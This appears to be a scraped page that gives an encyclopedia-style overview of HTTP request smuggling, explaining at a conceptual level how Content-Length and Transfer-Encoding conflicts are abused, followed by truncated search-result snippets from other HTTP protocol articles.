HTTP request smuggling (HRS) is a security exploit on the HTTP protocol that takes advantage of an inconsistency between the interpretation of Content-Length and Transfer-Encoding headers between HTTP server implementations in an HTTP proxy server chain.[1][2] It was first documented in 2005 by Linhart et al.[3]
The Transfer-Encoding header works by defining a directive on how to interpret the body of the HTTP request, with the common and necessary directive for this attack being the chunked transfer encoding.[4] When the Transfer-Encoding header is present, the Content-Length header is supposed to be omitted.[4] Working similarly but with a different syntax, the Content-Length header works by specifying the size in bytes of the body as a value in the header itself. [5] Vulnerabilities arise when both of these headers are included in a malicious HTTP request, bypassing security functions meant to prevent malicious HTTP queries to the server by causing either the front-end or back-end server to incorrectly interpret the request. [6] HTTP request smuggling commonly takes the form of CL.TE, TE.CL, or TE.TE, although more complex attacks using HRS do exist. [6]
HTTPrequestsmuggling (HRS) is a security exploit on the HTTP protocol that takes advantage of an inconsistency between the interpretation of Content-Length...
first HTTP version, named 0.9. That version was subsequently developed, eventually becoming the public 1.0. Development of early HTTPRequests for Comments...
Wide Web. When communicating via HTTP, a server is required to respond to a request, such as a web browser request for a web page, with a numeric response...
HTTP 403 is an HTTP status code meaning access to the requested resource is forbidden. The server understood the request, but will not fulfill it, if it...
Hypertext Transfer Protocol (HTTP) response status codes. Status codes are issued by a server in response to a client's request made to the server. It includes...
changing the request type of the new request to GET, regardless of the type employed in the original request (e.g. POST). For this reason, HTTP/1.1 (RFC 2616)...
response to a request of any type other than GET or HEAD, the client must ask the user before redirecting. Client request: GET /index.php HTTP/1.1 Host: www...
XMLHttpRequest (XHR) is an API in the form of a JavaScript object whose methods transmit HTTPrequests from a web browser to a web server. The methods...
receive multiple HTTPrequests/responses, as opposed to opening a new connection for every single request/response pair. The newer HTTP/2 protocol uses...
The ETag or entity tag is part of HTTP, the protocol for the World Wide Web. It is one of several mechanisms that HTTP provides for Web cache validation...
been performed, since RFC 2616 (HTTP 1.1). According to RFC 7231, which obsoletes RFC 2616, "A 303 response to a GET request indicates that the origin server...
Search with HTTPS. Most web servers maintain logs of all traffic, and record the HTTP referrer sent by the web browser for each request. This raises...
Because HTTPS piggybacks HTTP entirely on top of TLS, the entirety of the underlying HTTP protocol can be encrypted. This includes the request's URL, query...
HTTP header fields are a list of strings sent and received by both the client program and server on every HTTPrequest and response. These headers are...
HTTP pipelining is a feature of HTTP/1.1, which allows multiple HTTPrequests to be sent over a single TCP connection without waiting for the corresponding...
header should be sent with an HTTP status code of 3xx. It is passed as part of the response by a web server when the requested URI has: Moved temporarily;...
networking, HTTP 451 Unavailable For Legal Reasons is a proposed standard error status code of the HTTP protocol to be displayed when the user requests a resource...
compression schemes it supports by including a list of tokens in the HTTPrequest. For Content-Encoding, the list is in a field called Accept-Encoding;...
case of HTTP/0.9 no headers are transmitted). The request/response message consists of the following: Request line, such as GET /logo.gif HTTP/1.1 or Status...
attached to each HTTPrequest by the browser, JWTs must be explicitly attached to each HTTPrequest by the web application. The HTTP protocol includes...
Byte serving (other names: Range Requests; Byte Range Serving; Page on demand) is the process introduced in HTTP protocol 1.1 of sending only a portion...
request. This means that HTTPS implementations without Server Name Indication (SNI) support require a separate IP address per DNS name, and all HTTPS...
is protection against HTTP Parameter Pollution. HTTP response splitting HTTPrequestsmuggling Balduzzi et al. 2011, p. 2. "HTTP Parameter Pollution Vulnerabilities...
Content negotiation refers to mechanisms defined as a part of HTTP that make it possible to serve different versions of a document (or more generally,...
and the client would prompt the user again. Client request (no authentication) GET /dir/index.html HTTP/1.0 Host: localhost (followed by a new line, in the...